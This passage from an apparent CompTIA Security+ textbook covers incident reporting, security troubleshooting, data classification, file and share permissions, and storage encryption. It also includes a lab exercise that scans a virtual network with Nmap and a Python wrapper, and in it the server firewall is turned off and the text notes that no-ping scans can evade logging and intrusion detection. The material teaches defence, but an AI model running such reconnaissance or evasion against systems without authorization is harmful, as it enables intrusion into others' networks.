 Review of device configurations and installed applications for comparison to the security baseline.

Incident reports
Whether you're monitoring the network manually or using automated tools, your hope is to not encounter any
security incidents. You will anyway, of course, so you need reporting mechanisms that convey the severity
and other important details of each incident. Some common report types include the following.

Alarms High-priority notifications of a critical or ongoing incident needing quick response. Alarms
actively notify network administrators or other relevant personnel, in order to ensure a quick
human response to the incident. Alarms are an important feature of IDS and a number of other
security and performance monitoring systems, but you need to integrate them into your
organizational policies rather than handling them in an ad hoc manner. Not only do you need to
make sure that alarms reliably reach the right people, but you need to have appropriate response
procedures for each type of alarm.
Alerts Lower priority than alarms, alerts provide notice of changes in network conditions that may or may
not need administrator response eventually, but aren't immediately critical. An alert still represents
a specific event worthy of note. A system rebooting, a failed login attempt, or detection and
successful quarantining of malware all would generate alerts. Alerts need to be recorded in a way
that it's easy for administrators to review them and determine which need action.
Trends Instead of individually significant events, trends are the aggregate result of many minor events on
the network, especially those which wouldn't need a response individually but taken as a whole
form a meaningful pattern. One example of a short-term trend is a repeating pattern of TCP
connection attempts representing a port scan against the network. A rise in phishing emails aimed
at network users is a longer term trend. Trends can also represent changes in normal activity but
still need a response: even if a sharp increase in normal web traffic is only because of a popular
new service your company is providing, you'll still need to adjust your baseline traffic reports to
reflect it.

Note that some of these terms can also be used for reports by security services or software vendors to
customers and the general public. The principles and severity levels are fairly similar all the same: you might
receive an alert regarding a newly discovered vulnerability in an application (whether or not a patch is
immediately available), or a security agency might report on changing trends in malware attack types. Either
way, you'll want to pay attention to these reports, and respond to those which might specifically affect your
network.


Network security troubleshooting


After hardening and in between formal assessments, you need to be proactive with security troubleshooting
above and beyond just watching for alerts and scheduling audits. If you miss early signs of a critical server
failing, that's bad, but it's at least something you can fix after the fact if you've got good backups. If you miss
signs of security failures that open the path to a serious data breach, you may not even know you've been
attacked until long after the damage is done.
A big part is just to manually keep an eye out for changes and unusual network behaviors.
 When there's a connectivity or performance issue, or unusual user behavior, consider the possibility of
malicious action. For example, crashes or slowdowns with no apparent other cause might be caused by
DoS attacks.
 Monitor for unauthorized probing or eavesdropping on the network.
 Watch for unauthorized user accounts or rogue devices.
 Keep hosts, devices, and software up to date, importantly including any security software.
 Verify security settings after firmware or software installations or upgrades to make sure they haven't
changed.

One way security holes are introduced is when a technician troubleshooting a network problem disables
security measures. This isn't bad in itself, but you have to make sure to minimize risk.
 Ensure that security is only bypassed in a formal troubleshooting process, and that the process is easy
to follow. When they're in a hurry, users will be distressingly willing to disable firewalls and share
accounts "just because it works that way."
 Disable only security measures immediately relevant to the problem at hand.
 If necessary, isolate or additionally secure particularly sensitive systems or data when other security
measures must be disabled.
 Be sure to re-enable security measures after the problem is solved. If security settings themselves were
the cause of a problem, relax them only enough to minimize other risk.

A major risk of securing the network is making security settings so strict that they interfere with normal
operation. This is a problem because of the disruptions it causes directly, and also because even otherwise
responsible users have an almost supernatural knack for bypassing and compromising safeguards that get in
the way of them doing their jobs. If security measures get in the way and can't be easily fixed, they'll tend to
be bypassed, abandoned, or disabled without notification; whatever your policies say, you need to make sure
security doesn't get in the way of usability and that conflicts are quickly corrected.
 When hosts or resources are unreachable, check firewall settings and ACLs, opening ports or adding
permissions as necessary.
 Update trusted user permissions to match changing duties: users assigned new tasks they don't have
permissions for is a prime cause of well-intentioned account sharing.
 After hardware or software updates, make sure that no access problems have been introduced.

Remediation
Scans, audits, and reports all will eventually turn up security problems. When they do, you need a remediation
policy for fixing them. While this policy might include specific procedures for likely events, you can't
meaningfully plan for everything that can possibly go wrong. Instead, it's important to create a framework that
can be applied to incidents as they occur.
A critical part of remediation is assigning priority to incidents, not only in terms of the damage they can do
but how time-critical it is to correct them. On one end of the scale, a minor misconfiguration in authentication
settings on an internal network application might still leave the application secure enough that fixing it can


wait until an administrator has some free time. On the other hand, discovering a critical vulnerability in an
internet facing server holding sensitive data might mean that you have to shut it down and correct the issue
immediately, even if it disrupts business operations. Others are in between: if trend reports show an increase
in a certain type of network attack but you haven't actually seen any signs of it, you might want to schedule a
vulnerability assessment to see if your systems are at risk.
Other important aspects of remediation policy include assigning particular incident types to personnel with
suitable skills and permissions, determining the underlying cause of problems, and adapting the network's
security posture to either prevent the problem from recurring or, if that isn't possible, minimizing its effect on
the network's performance and security.

Exercise: Scanning the network


In this exercise you'll use Nmap, a popular security scanner and network mapper. You could use it on your
network to find open ports, vulnerabilities, or even rogue systems.
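
Zenmap is only a front end: each profile in this exercise corresponds to an ordinary nmap command line (Ping scan is roughly nmap -sn, and Intense scan is roughly nmap -T4 -A -v; the Command field in Zenmap shows the exact options). If you'd rather script your scans, a small Python wrapper along these lines would work, assuming nmap is installed and you're authorized to scan the target range.

# Sketch: run the same scans as the Zenmap profiles from a script (nmap must be installed).
import subprocess

def run_nmap(*args):
    result = subprocess.run(["nmap", *args], capture_output=True, text=True, check=True)
    return result.stdout

print(run_nmap("-sn", "10.10.10.0/24"))              # ping scan: which hosts on the subnet respond
print(run_nmap("-T4", "-A", "-v", "10.10.10.2"))     # intense scan of a single host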
Do This How & Why

1. Note the IP addresses of both your Windows 7 and Windows 2012 VMs.

a) In Windows 7, open a command window.

b) Type ipconfig.

c) Take note of the IP address for the Windows 7 VM. In Windows 2012, the IP address is 10.10.10.2.

2. On the Windows 7 desktop, double-click Nmap - Zenmap GUI. Zenmap opens. It's a GUI front end for the
Nmap utility in Windows.

3. Scan for hosts on your subnet.

a) In the Target field, type 10.10.10.0/24. Nmap uses CIDR notation, so this will scan all addresses in the
10.10.10.0 subnet.

b) From the Profile list, select Ping scan. The Command field is automatically updated to show the
command-line parameters your scan will use.


c) Click Scan. A few moments later, the IP and MAC addresses of each responding host appear. There are
four responding hosts: the router, the Windows 2012 server, the hypervisor for the virtual environment, and
the Windows 7 workstation itself.

4. Perform an intense scan on the Windows 2012 system. An intense scan shows much more information
about a host.

a) In the Target field, enter 10.10.10.2.

b) From the Profile list, select Intense.

c) Click Scan. You should see a lot more information this time, since the
server is running a lot of network services. It takes a while to
complete, but it includes a wide variety of information about
each running service and the operating system itself, including
brand and version. This sort of information would be valuable
to an attacker.

5. Scan the Windows Server 2012 system again, with its firewall disabled.

a) In Windows Server 2012, open Windows Firewall. The quickest way is to type Firewall at the Start screen.

b) On the left of the Windows Firewall window, click Turn Windows Firewall on or off. Currently the
firewall is on for both public and private networks.

c) For domain networks, click Turn off Windows Firewall.

d) Click OK.


e) In Windows 7, perform a Quick Scan of the Windows Server 2012 system. Several more ports are visible
even on a less intense scan. Windows Firewall normally blocks access to these.

f) Choose Intense scan, no ping, and scan again. This scan avoids using ping packets, which are filtered by
some firewalls and can trigger logging or IDS systems. The intense scan takes longer, but gives much more
information. For example, specific details of listening services are listed.

6. Perform an intense scan of the virtual router. Its IP address is 10.10.10.1. Nmap detects some open ports
on the router, including port 80 for the web interface. It can't clearly identify the operating system, but one
of the top guesses, FreeBSD, is correct.

7. Explore further results of your scanning. Nmap compiles overall network information based on your scan
results.

a) Observe the left pane. It gives a list of addresses on the subnet. The router even has a
name of pfsense.localdomain. You can select any of these to
show its results in the right pane.

b) With 10.10.10.1 selected, click the Ports/Hosts tab. Ports 53 (DNS) and 80 (HTTP) are open. Nmap even
identified the web server application as lighttpd 1.4.37: you could use this to research specific vulnerabilities
of that server.

c) On the left, click 10.10.10.2. The Windows server has a whole list of active ports,
representing network services. Many of them aren't very safe
for internet use, which is part of why a LAN should always be
protected by a firewall.


d) Click the Topology tab. The network is very simple, so all available hosts are within one hop of the local
host.

e) Click the Host Details tab. It shows further details about the selected host.

f) Click the Scans tab. It shows the scans you've performed. You can also save scans
you might want to perform again in the future.

8. Close Zenmap. Don't save your scans.

9. In Windows Server 2012, enable the firewall.


Assessment: Monitoring and detection


1. An interface monitor is likely to be one part of a larger monitoring tool. True or false?
 True
 False

2. What SNMP component is a database for a particular device? Choose the best response.
 Agent
 Manager
 MIB
 OID

3. Even though Syslog has been around a very long time, it hasn't always been a well-defined standard. True
or false?
 True
 False

4. What SIEM software feature finds broader trends and relationships formed by individually insignificant
events? Choose the best response.
 Aggregation
 Correlation
 Deduplication
 Synchronization

5. What kind of tool is often called a sniffer? Choose the best response.
 Database vulnerability tester
 Network mapper
 Protocol analyzer
 Wireless analyzer


Summary: Securing networks


You should now know:
 About network security components, including network ACLs, firewalls, IDS/IPS systems, honeypots,
content filters, load balancers, proxy servers, and UTM solutions.
 How to apply secure transport encryption on multiple layers of the network, including secure
application protocols, Wi-Fi encryption, and VPNs.
 How to harden networks using segmentation and a defense in depth strategy.
 How to use monitoring and detection tools to maintain network performance and security, and how to
evaluate network security posture through a regular monitoring and incident handling process.



Chapter 6: Securing hosts and data
You will learn:
 How to secure data
 How to secure hosts and applications
 How to secure mobile devices


Module A: Securing data


As the name implies, the heart of information security is securing information. Wherever it's stored, used, or
transmitted, you need to make sure that all sensitive data is kept safe from the wrong eyes. Using defense in
depth, you can do most of the work by securing the hosts, networks, and user policies around the data itself,
but that's not all of it.
You will learn:
 About data classification and policies
 About the data life cycle
 How to control data access
 How to apply encryption

Classification levels
Not all data needs the same security. It doesn't make sense to keep all of your organization's data under
strict controls either: that's a lot of work to maintain, and it's inconvenient for users besides.
Someone's bound to get lazy with a bit of information that's clearly harmless, and soon someone else takes the
same shortcut with actual company secrets. Instead, you need to create an information classification policy
which defines three things.

Exam Objective: CompTIA SY0-501 5.8.2.1, 5.8.2.2, 5.8.2.3

1. The types of information stored by your company, as grouped by sensitivity level
2. Who needs to access each class of information
3. How each class of information needs to be protected

Governments have a long history of formally classifying information, so they're a good place to look for
models. For example, the US government classifies sensitive information according to what harm its
release could do to national security, using four primary levels.

Top secret The most heavily secured information, which could cause grave danger to national security if
released.
Secret Information which could cause serious danger to national security if released, but is less
sensitive than top secret.
Confidential Information which could cause damage to national security, but is less sensitive than secret.
Unclassified All other information. Some is still only released to law enforcement or other approved
agencies, and the rest is available to any citizen who requests access.

Each level of classified information can only be viewed by people with the corresponding security clearance
or higher. In addition, sensitive compartmentalized information (SCI) has an additional codeword related to
the field of information it's used in, usually indicating particular government programs or areas of knowledge.
Even with the right clearance level, users can't access SCI documents unless they also have the matching SCI
clearance, issued on a need-to-know basis.
To enforce that privacy, each level of classified information has protections according to its sensitivity. It can
only be stored in systems, containers, or facilities rated to its level. Each level has different standards for
physical shipment, and digital data must be transmitted on special networks and protected with approved
encryption methods. Even the destruction of classified documents must be witnessed and logged, and
performed in a way that ensures it can't be recreated.

Private organizations can define whatever classification schemes they want. For example, yours might use
High, Medium, and Low to mark sensitivity, or Confidential, Proprietary, and Public. The important thing is
that all data is assigned an appropriate sensitivity level, and each level is consistently secured by an
appropriate set of standards.

Note: Remember, data being "Unclassified" or "Public" doesn't mean it gets no security. Even when
information isn't confidential, you still need to protect its availability and integrity.

Personally identifiable information


Personally identifiable information (PII), sometimes known as sensitive personal information (SPI) is a fairly
broad term used to refer to information that can uniquely identify or locate an individual person, or can be
used in conjunction with other information to do so. PII is a legal term rather than a technical one, so exactly
what does or doesn't count depends on your jurisdiction. NIST Special Publication 800-122 defines PII as
follows:

Exam Objective: CompTIA SY0-501 5.2.8.5, 5.2.8.6, 5.8.4


“Any information about an individual maintained by an agency, including (1) any information that can be
used to distinguish or trace an individual's identity, such as name, social security number, date and place of
birth, mother's maiden name, or biometric records; and (2) any other information that is linked or linkable to
an individual, such as medical, educational, financial, and employment information.”
As this implies, PII can be a lot of things, and other countries are even more inclusive than the US. Common
types of information that can qualify as PII, either on their own or in conjunction with other information, include:
 Full name
 Home, email, or IP address
 Telephone number
 Government identification numbers, such as driver's license, passport, or social security/insurance
 Credit card or bank number
 Biometric information
 School or workplace
 Grades or salary
 Age, gender, or race
 Family members

If this is starting to sound like every form you've ever filled out, you've got a good idea how ubiquitous PII is.
PII in the wrong hands enables identity theft, harassment, and general intrusion of privacy; for this reason, its
use and storage is heavily regulated in most nations and by some industry standards. Even were it not,
customers and employees are sensitive about their privacy. Either way, your organization needs to have a clear
and enforced policy recognizing what stored data qualifies as PII, and how that data is secured, used, and
shared with other organizations.
Some industries face stricter PII rules than others, if only because of the types of data they handle. Examples include:
 Health-related industries must protect Protected Health Information (PHI) attached to individual health
records.
 Educational institutions must protect student records, especially those belonging to minors.
 Any business accepting payment cards is required by its vendor agreement to protect customer payment
data.

Wherever you are and whatever your business is, before you finalize a data classification policy you need to
identify what PII your organization stores. You should also seek a legal opinion on exactly how your local
laws and existing contractual obligations require you to secure it. If you ever do have a serious data breach,
the last thing you want is a fine or lawsuit added on.

Note: PII isn't the only kind of data that might be subject to special requirements. For example, many
public agencies and financial institutions are required by law to retain a wide variety of data, often for
years or permanently, in order to comply with transparency guidelines. While this data must be available
to proper authorities, it's often sensitive material that must be tightly secured otherwise.

Data ownership
Data security often fails at the human level, especially when no one in the organization is quite clear who is
responsible for what part of security. Information security policies should specify various roles in maintaining
or securing valuable data both for organizational purposes and regulatory compliance. In a typical
organization you might have the following roles for any given class of data.

Exam Objective: CompTIA SY0-501 5.8.3

Data owner In this context not the legal owner of intellectual property, but the person in the
organization with ultimate responsibility for keeping data safe and complying with
applicable regulations. For example, the director of Human Resources might be the data
owner for employee files while the treasurer or CFO is the owner of financial data. Data
owners ultimately decide how data is classified and determine the rules for who can access
it.
Data custodian A system administrator responsible for creating and enforcing the technical controls
regarding access to data, under the direction of its owner. Data custodians control user
permissions to access data, implement security controls to keep it safe but available, log
access data, and produce reports for data owners.
Data steward A person responsible for data management from a business and stakeholder perspective.
The data custodian or even owner might have steward responsibilities, but it can be
someone entirely separate. Data stewards ensure that data quality meets business needs,
that data is supported by sufficient metadata to make it easy to use, and that it meets all
regulatory requirements. They also work with stakeholders to create and monitor data
acquisition and dissemination procedures.
Data user Anyone who is given access to data by its owner or custodian. Users are required to
comply with any user policies regarding sensitive data, and to report any potential
incidents to appropriate authorities.
Privacy Officer An executive who oversees the development, implementation, and enforcement of privacy
policies regarding personal employee or customer data. The existence and duties of
privacy officers are specified by many PII and PHI regulations. In many companies this
will be a senior executive position, such as a Chief Privacy Officer (CPO). Privacy officers
must work with all applicable data owners in the organization to make sure that personal
information is appropriately protected.

States of data
In addition to how sensitive it is, what you need to do to secure data depends on the state it occupies.
Generally speaking there are three states of digital data, even if there's some debate where some of the
boundaries are.

Exam Objective: CompTIA SY0-501 6.1.20, 6.1.21, 6.1.22

Data in transit Data that's being transmitted through a network. It can be further subdivided between data
on trusted networks such as a corporate intranet, and data on an untrusted network such as
the internet. Transit is when data is most exposed to attack, so protecting it is one of the
primary goals of network security. Data on private networks can be secured by restricting
unauthorized access, while data on public networks must be protected via cryptography.
Data at rest Data that's being stored on some sort of persistent medium, such as disk or tape. It can be
further divided according to whether it's connected to an active or networked computer, or is
in storage on offline media. Data at rest is primarily protected by physical security and, if
applicable, host security. Encryption can add extra security, especially for easily stolen
external media and portable devices.
Data in use Data being actively processed or stored in non-persistent form. At the least, it includes data
in system memory, caches, or CPU registers. It can also include databases being actively
modified, or other files subject to frequent change but technically on persistent media. Data
in use can be compromised by rootkits or other malware, as well as some other attacks. In
the past, it was the least likely to be secured, but that's changing; operating system hardening
has gradually made it more difficult to read data used by other applications, and memory
encryption technology is being adopted by many high security systems.

Data in any state can include metadata, or data that primarily contains information about other data. For
example, files have creation and modification dates, user permissions, and possibly tags or thumbnails.
Metadata on an email message includes its sender and recipient as well as message-specific information like
the subject line. Metadata can be valuable to an attacker, and it's often not kept as secure as the data it
describes.
While you should ensure that data in each state has appropriate security, you need to look at the three as a
unified whole, part of the overall data life cycle. It's all the more important as technology evolves: today's
data is increasingly handled on networked or cloud systems where it's hard to really keep track of what state
any particular piece of data is in at a given moment.

The data life cycle


When you design a data policy, it needs to govern the entire life cycle of each data class. This should address
security questions related to each step of its use. The answers to each question should not only be based off of
best security practices, but also off of specific regulatory requirements for any data you keep.

1. Creation/Acquisition  How will data be classified when it is created or acquired from other sources? What
                         special restrictions apply to data acquired from customers or business partners?
2. Use/Storage           Who can access data of each classification? How should data be protected at rest
                         and in transit? Can the data be stored on USB devices or cloud services?
3. Retention/Archival    How long will data be kept when it's no longer in use? How will archived data be
                         stored and protected?
4. Wiping/Disposal       How will sensitive files be deleted from media when no longer in use? How will
                         documents and media be securely disposed of when no longer needed?

Data loss prevention (DLP)


Data loss prevention (DLP) software is used to classify and protect your organization's confidential and
critical data. Within the software, you create rules that prevent users from accidentally or maliciously sharing
particular types of data outside your organization. For example, a DLP rule might prevent users from
forwarding any business emails outside of the corporate mail domain. Another DLP rule might prevent users
from uploading files to a consumer cloud service, like OneDrive or Dropbox. Yet another type of rule would
prevent users from copying files to removable media.

Exam Objective: CompTIA SY0-501 2.1.10, 2.3.6, 2.4.10

An example of DLP being used for email

DLP can be used in a variety of situations. The software can be installed on network perimeters, on endpoint
systems, or in cloud services. Advanced DLP systems even use machine learning algorithms to detect when
data is being accessed or exchanged in an unusual manner.

Big data
Modern businesses might handle relational databases or file servers containing gigabytes or even terabytes of
information. By any historical standard that's enormous, and it can be a challenge to manage it. At the same
time, today's computers are powerful enough that databases of that size can often be processed, stored, and
secured in much the same way that you would handle any other data in a personal folder or shared location.
This isn't true of all data though: many organizations now handle data sets measured in the petabytes or
exabytes. The rapid expanse of data collection and storage technology has helped there, but traditional
analysis and security methods struggle to manage the results.
Big data is a term for data sets too large to be handled by traditional data processing applications. These sets
are used by a lot of fields: scientific data collection, internet search and tracking data, business and finances,
and so on. Very frequently, they hold a variety of data that isn't directly related and isn't directly reviewed or
sorted in the way smaller sets are—it's analyzed for patterns by automated tools and used to recognize trends
or predict outcomes. On top of it all, big data is often in constant real-time availability, accessed broadly
across enterprise networks or via the internet.
Big data can't really be traditionally secured either: since it's so large, and so shared, it doesn't fit easily in the
standard perimeter security model used for sensitive data, and can provide an enormous attack surface. It's
accessed so widely and rapidly that monitoring user transactions with big data sets is impossible without
automated tools. It's also a rapidly changing new technology: commonly administrators are unprepared,
applications are immature, and regulatory requirements are unclear. On the up side, big data itself can be used
for security. For example, big data analysis has become a prime tool in the financial industry, tracking for
signs of fraud by searching for anomalous transaction patterns. Either way, if your organization works with
big data, you'll need to study its specific security needs.

Discussion: Data security


1. What sorts of PII does your organization manage?
Answers may vary, but at the least you're likely to have employee and customer data.
2. For some important type of data in your organization, name its owner, custodian, and users.
Answers may vary.
3. How can data in use be compromised? Why would an attacker target it then rather than in transit or at
rest?
Answers may vary, but rootkits and other malware have been designed to do so. Data in use is much less
likely to be encrypted than that sent over a network or even stored in a file.
4. What data loss prevention measures does your organization use?
Answers may vary. There is dedicated DLP software, but many organizations use computer and user
policies instead.

File permissions
On a properly secured host, the first line of security for data is the set of access control lists (ACLs) used by the
operating system to secure access to resources, including files on disk and other data sources. For example, as
an ordinary Windows user, you can't access the personal documents of other local users on the same computer
—if you try to navigate to those folders or open their files, you'll receive an error message. Likewise, SQL or
other database systems often implement user-based security models, restricting some data to specific users.

Exam Objective: CompTIA SY0-501 4.3.7


Users (or malware) with administrative credentials can overcome these limitations, but against ordinary
malicious users or compromised applications, controlling resource permissions can greatly increase data
security. Sensitive data shouldn't be stored on shared network folders unless it must be accessible over the
network; if it must, the folder should be secured so that only intended users can access it. Locally used data
should likewise be stored in folders readable only by users who need it. If data only needs to be accessed by
its owner, that's simple: by default each user's personal folders are readable only by that user, so private
documents can be stored there.

Directory permissions
On some systems, such as Windows with NTFS and Linux, you can implement file and folder (also referred
to as directory) permissions. With file and folder permissions, you either grant access permissions at various
levels to individual users or groups of users, or you explicitly deny access. If you explicitly apply the
deny permission to a user or group, it overrides any other permissions they might have been assigned. This
adds a layer of security for access to your data.

NTFS permissions

Read
  Folder: User can view the contents of the folder and any subfolders.
  File: User can view the contents of the file.

Write
  Folder: Read permission, plus the user can add files and create new subfolders.
  File: Read permission, plus the user can make changes (write) to the file.

Read & Execute
  Folder: Read permission, plus the user can run executable files contained in the folder. This
  permission is inherited by any subfolders and files.
  File: Read permission, plus the user can run a file if it is executable.

List Folder Contents
  Folder: Read permission, plus the user can run executable files contained in the folder. This
  permission is inherited by subfolders only.
  File: N/A

Modify
  Folder: Read and Write permissions, plus the user can delete the folder.
  File: Read and Write permissions, plus the user can delete the file.

Full Control
  Folder: Read, Write, and Modify permissions, plus the user can delete all files and subfolders.
  File: Read, Write, and Modify permissions, plus the user can delete the file.

Some caveats to be aware of:


 If you don't assign a permission, no access is the default.
 A user's permissions are the sum of the permissions they have been assigned individually and obtained
through any groups in which they are a member. This is called effective permissions. For example, if
you assign Jake Read permission to the Reports folder, and Jake is a member of the Accounting group,
to which you have assigned Modify permission, then Jake effectively has Modify permission on the
Reports folder.
 The exception to the "permissions sum" rule is an explicit deny: if Jake is denied permissions to the
folder, either individually or through a group, the Deny permission takes precedence over all other
permissions he might otherwise have. (See the icacls example after this list.)
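Here's a rough sketch of how you might apply rules like these from an elevated Command Prompt with the
built-in icacls tool. The C:\Reports path and the Accounting and NewUser account names are hypothetical
examples, not part of any lab setup.

    rem Grant the Accounting group Modify, inherited by subfolders (CI) and files (OI)
    icacls C:\Reports /grant Accounting:(OI)(CI)M
    rem Explicitly deny one user the Delete right; deny entries override inherited allows
    icacls C:\Reports /deny NewUser:(OI)(CI)D
    rem Review the resulting ACL to confirm the effective entries
    icacls C:\Reports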

Linux permissions
In the Linux file system each file or directory (folder) has three basic permission types:
 Read (r): User can view the contents of a file, or list the contents of a directory.
 Write (w): User can modify the contents of a file, or create and delete files within a directory.
 Execute (x): User can run an executable file, or enter (traverse) a directory.

In Linux, each and every file is owned by a single user and a single group, and has its own access
permissions.
 Owner is the person who is responsible for the file.
 Group includes members of the file's group.
 Others includes all users who are not the file's owner and are not members of its group.
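As a quick illustration (the file name, user, and group here are made up), you can view and change these
permissions from a shell with ls, chmod, and chown:

    # Show the owner, group, and permission bits for a file
    ls -l budget.ods
    # Example output: -rw-rw-r-- 1 maria accounting 24576 Jan  5 10:12 budget.ods
    # Remove all access for others, leaving owner and group with read/write
    chmod o-rwx budget.ods
    # The same permissions expressed numerically: owner rw (6), group rw (6), others none (0)
    chmod 660 budget.ods
    # Change the file's owner and group (requires root)
    sudo chown maria:accounting budget.ods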

File attributes
File attributes are settings associated with computer files that grant or deny certain rights to how a user or the
operating system can access that file.

 Read-Only (R): Allows a user or the operating system to read a file, but not write to it.
 Archive (A): Specifies the file should be backed up.
 System (S): Indicates the file is a system file and shouldn't be altered or deleted. By default, system
files are hidden.
 Hidden (H): Suppresses the display of the file in directory lists, unless you issue the command to list
hidden files.
 Directory (D): Indicates a folder or sub-folder, differentiating them from files.
 Not content-indexed (I): Excludes the file from the Windows search index, which normally indexes all
files and directories on a drive to achieve faster search results.

Additional attributes are available on NTFS volumes:


 Compressed (C): On an NTFS file system volume, each file and directory has a compression attribute.
Other file systems may also implement a compression attribute for individual files and directories.
 Encrypted (E): On an NTFS file system volume, each file and directory has an encryption attribute as
part of the Encrypting File System (EFS) .

• When you encrypt a directory, all new files created in that directory are encrypted from that point
forward.
• You can select to encrypt the directory's current contents when you perform the encryption.
• Encryption applies to the local system only.
• If you copy an encrypted file or directory to any other file system, the file or directory is no longer
encrypted.
• A file can't be compressed and encrypted at the same time. The attributes are mutually exclusive.
• After you encrypt a file or folder, its name appears in green in Windows Explorer.

In addition to using the Windows interface to modify file and folder attributes, you can also use the
attrib.exe command. Its syntax is: ATTRIB [ + attribute | - attribute ] [pathname]
[/S [/D]].

 + enables the attribute
 - clears the attribute
 pathname: drive and/or filename. For example: C:\documents\*.doc
 /S searches the pathname including all subfolders
 /D includes directories in addition to files
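For example (the path and file names are hypothetical), you might use attrib like this:

    rem Make a document read-only and hidden
    attrib +R +H C:\documents\plans.doc
    rem Clear the hidden attribute from all .doc files in the folder and its subfolders
    attrib -H C:\documents\*.doc /S
    rem Display the current attributes of the folder's contents
    attrib C:\documents\*.*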

Share permissions
When a Windows computer is connected to a network, you can share its resources with other users on the
network. This is referred to as a local share. A shared resource can be hardware (such as a printer or disk
drive), an application, or a file or folder. Similar to directory permissions, you assign or deny permissions for
each shared resource.
Windows share permissions

Permission Allows user to remotely


Read  View file names and subfolder names
 View data in files
 Run program files

Note: Read is the default Share permission assigned to the Everyone group.

Change All Read share permissions, plus:

 Add files and subfolders


 Change data in files
 Delete subfolders and files

Note: The Change Share permission isn't assigned to any group by default.

Full Control All Read and Change permissions, plus:

 Change file and folder permissions (NTFS files and folders only)
Note: Full Control is the default permission assigned to the Administrators group on the
local computer.

Some things to know about share permissions:


 They apply only to users who gain access to the resource over the network. They do not apply to users
who log on locally. NTFS permissions apply locally.
 They apply to all files and folders in the shared resource. If you need a more detailed level of security
on subfolders and individual files, you will need to use NTFS permissions in addition to share
permissions.
 They are the only method for securing shared resources on FAT and FAT32 volumes.
 You can specify how many users are allowed to access the resource at one time.

You can control access to shared resources using share permissions, NTFS permissions, or both. If you use
both, be aware that the more restrictive permission always applies. For example, if the share permission is set
at the default (Everyone has Read permissions) and the NTFS permission grants a user the Modify
permission, the share permission applies. The user will not be able to make changes to the file.
Just like with NTFS file permissions, an explicit deny share permission overrides all other permissions to the
shared resource. You'll specifically assign deny permission only when you want to override specific
permissions that are already assigned.
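As a simple sketch (the share name, path, and user limit are hypothetical), you can create and manage a share
from an elevated Command Prompt with the net share command. Remember that any NTFS permissions on the
folder still apply on top of the share permissions, with the more restrictive setting winning out.

    rem Share the folder read-only for everyone on the network, limited to 10 concurrent users
    net share Reports=C:\Reports /grant:Everyone,READ /users:10
    rem Review the share's settings, and remove it when it's no longer needed
    net share Reports
    net share Reports /delete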

Discussion: File permissions


1. On an NTFS volume, all users on your team have full access permission to the project folder. The one
problem is that it's really easy to delete important files and you'd rather make sure the new guy can read
and edit but not delete anything. How can you do this?
The easiest way would be to add an entry for that one user's account explicitly denying only the Delete
and Delete Subfolders and Files advanced permissions. An explicit deny overrides the inherited group
permissions, so the new user can still read and edit files but can't delete anything.
2. On a Linux volume, what do r, w, and x stand for?
r is Read, w is Write, and x is Execute.
3. How can you secure access to files on a FAT32 volume?
You can only secure them using shared folder permissions. You can't secure them locally. This is part of
why FAT32 shouldn't be used on modern systems.

Storage encryption
File permissions are only one layer of security. Not only can they be circumvented within the operating
system, they don't give any protection at all if you bypass the operating system in the first place. If you have
physical access to a system, you can move its drives to another computer, or boot from a live CD; either
way, you can then bypass the original drive's ACLs. A more secure solution is to encrypt sensitive data so even
someone who can access the file can't read it without a key.
In the past, encryption had a reputation for being slow and cumbersome to use, and strong methods faced
strict legal restrictions. These problems haven't entirely gone away, but there are many options for strong
encryption today, some of which might already be installed on your workstation or removable media.
Since removable storage is at the greatest risk, some USB flash drives have built-in encryption. When you
insert the drive, you can only access a read-only partition holding the encryption software: you need to supply
the key in order to access the rest of the drive. Some include encryption hardware that improves performance
and security. Similarly, nearly all mobile devices include some sort of storage encryption feature, whether or
not it's enabled by default.
When you're transporting files or storing them long-term, you might already compress them into archive
formats like .zip or .rar. Most archive applications allow you to encrypt archive files with a password, but you
need to be careful if you rely on them for security. Traditional .zip archives don't hide the names of files in the
archive, and the content encryption is extremely weak by modern standards. Newer compression programs
can create .zip files with AES encryption that's almost impossible to break with a strong password; alternate
formats like .rar or .7z use AES and even allow you to hide file names.
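For example, if the 7-Zip command-line tool is installed, commands like these create password-protected
archives (the archive and folder names are placeholders):

    rem Create an AES-encrypted .7z archive; -p prompts for a password and -mhe=on also hides file names
    7z a -t7z -mhe=on -p secret.7z C:\Projects\Confidential\
    rem A password-protected zip is more widely compatible; -mem=AES256 avoids the weak legacy ZipCrypto
    7z a -tzip -mem=AES256 -p secret.zip C:\Projects\Confidential\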
Some applications allow you to encrypt their data files. In particular, some database applications have a
transparent database encryption (TDE) feature that automatically encrypts all database files and backups,
without affecting application functions.
For more flexible protection of data, especially if you also want to access it normally on your own computer,
there are software applications that will seamlessly encrypt files and folders on your hard drive. For even
more protection you can use full disk encryption (FDE) to protect entire drives and systems. Some even make
use of hardware acceleration or key generation systems built into many computers, making encryption faster and
more convenient. There are a variety of commercial solutions available, such as Sophos SafeGuard and Symantec
Endpoint Protection; while the popular freeware TrueCrypt has been discontinued, other non-commercial
options are available.

Encryption hardware
On powerful modern computers, encryption and decryption are less of a burden than ever before, but software
methods can still hurt performance, and even if some solutions are quite secure others have vulnerabilities.
For applications that need to be both high performance and high security, it's worth considering hardware that
accelerates or even seamlessly manages data encryption for you.

Exam Objective: CompTIA SY0-501 2.1.17, 3.3.1.1, 3.3.1.2, 3.3.1.3


Hardware including secured cryptoprocessors is available both for removable storage and for computers
themselves.

Self-encrypting drive (SED)
    A hard drive or flash drive with a built-in FDE chip, either inside a tamper-resistant case or
    integrated into the drive controller. Like any FDE solution, the SED encrypts all data on the
    drive, rendering it unreadable unless the key is entered during system boot or when it's
    connected. Since it has its own encryption hardware, a SED doesn't suffer a performance hit from
    encryption, and doesn't require operating system support.

Smart card
    Smart cards often include cryptographic functions, either to secure their own data or to store
    certificates and other cryptographic keys. For example, the SIM cards used in cell phones
    securely store the cryptographic keys needed to authenticate and encrypt data on the cell
    network.

USB encryption
    USB hardware dongles can be used to store encryption keys for drive encryption or other
    functions. Even ordinary USB flash drives can do the same, though they won't offer acceleration
    or the same key security standards.

Trusted platform module (TPM)
    A standard for generating, storing, and using cryptographic keys by means of a chip built into a
    computer, typically installed onto the motherboard. TPMs can be used for drive encryption,
    digital rights management, or enforcement of software licenses. They can also accelerate
    cryptographic processing itself, boosting encryption performance.

Hardware security module (HSM)
    A standard for removable devices that provide key storage and cryptographic functions. An HSM
    has similar functions to a TPM, but it's a removable card or external device rather than an
    intrinsic component. High-performance HSMs are typically external network devices used to secure
    and accelerate the RSA and ECC cryptography used by secure websites and financial transactions.

Windows encryption
If you're lucky, your operating system might already include encryption support. There are two encryption
systems included with some Windows editions.
 Encrypting File System (EFS) allows encryption of individual files and folders on any NTFS volume. It is
